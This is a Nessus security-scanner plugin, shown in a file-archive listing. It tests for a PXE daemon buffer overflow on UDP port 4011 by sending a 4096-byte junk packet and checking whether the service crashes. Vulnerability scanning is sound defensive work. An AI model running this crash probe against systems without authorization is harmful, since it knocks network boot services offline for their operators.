home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pxe_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  99 lines
  1. #
  2. # This script is (C) Tenable Network Security
  3. #
  4. #
  5.  
  6. if(description)
  7. {
  8.  script_id(11612);
  9.  script_bugtraq_id(7129);
  10.  script_version ("$Revision: 1.5 $");
  11.  
  12.  
  13.  name["english"] = "PXE server overflow";
  14.  
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. The remote host is running PXE (Preboot eXecution Environment),
  19. a daemon which can be used to boot diskless clients which
  20. have an intel network card.
  21.  
  22. There is a flaw in the remote PXE which may allow an attacker
  23. to gain a root shell on this host.
  24.  
  25. *** Nessus disabled this service to perform this security check
  26.  
  27. Solution : Disable this service
  28. Risk factor : High";
  29.  
  30.  
  31.  script_description(english:desc["english"]);
  32.  
  33.  summary["english"] = "buffer overflow in pxe daemon";
  34.  script_summary(english:summary["english"]);
  35.  
  36.  script_category(ACT_DESTRUCTIVE_ATTACK); 
  37.  
  38.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  39.  family["english"] = "Gain root remotely";
  40.  family["francais"] = "Passer root α distance";
  41.  script_family(english:family["english"], francais:family["francais"]);
  42.  exit(0);
  43. }
  44.  
  45. #
  46. # The strategy is to send an empty UDP packet and expect an ICMP-unreach message.
  47. # If we don't get one, we crash the remote service and try again. If the results
  48. # differ, then there was a service.
  49. #
  50.  
  51.  
  52. function check(dport)
  54.  local_var sport;
  55.  sport = rand() % 65000 + 1024;
  56.  ippkt = forge_ip_packet(
  57.         ip_hl   :5,
  58.         ip_v    :4,
  59.         ip_tos  :0,
  60.         ip_len  :20,
  61.         ip_id   :31337,
  62.         ip_off  :0,
  63.         ip_ttl  :64,
  64.         ip_p    :IPPROTO_UDP,
  65.         ip_src  :this_host()
  66.         );
  67.  
  68.  
  69.   udppacket = forge_udp_packet(
  70.         ip      :ippkt,
  71.         uh_sport:sport,
  72.         uh_dport:dport,
  73.         uh_ulen :8
  74.         );
  75.     
  76.   filter = string("src host ", get_host_ip(), " and dst host ", this_host(),
  77.  " and icmp and (icmp[0] == 3  and icmp[28:2]==", sport, ")");
  78.   for(i=0;i<7;i++)
  79.   {
  80.       res = send_packet(udppacket, pcap_active:TRUE, pcap_filter:filter, pcap_timeout:1);
  81.     if( res != NULL ) return(1);
  82.   }
  83.   return(0);
  84. }
  85.  
  86.  
  87. if(check(dport:4011) == 0 )
  89.   soc = open_sock_udp(4011);
  90.   send(socket:soc, data:crap(4096));
  91.   r = recv(socket:soc, length:4096);
  92.   if(r)exit(0);
  93.   
  94.   close(soc);
  95.   sleep(1);
  96.   
  97.   if(check(dport:4011) == 1)security_hole(port:4011, proto:"udp");
  98. }
  99.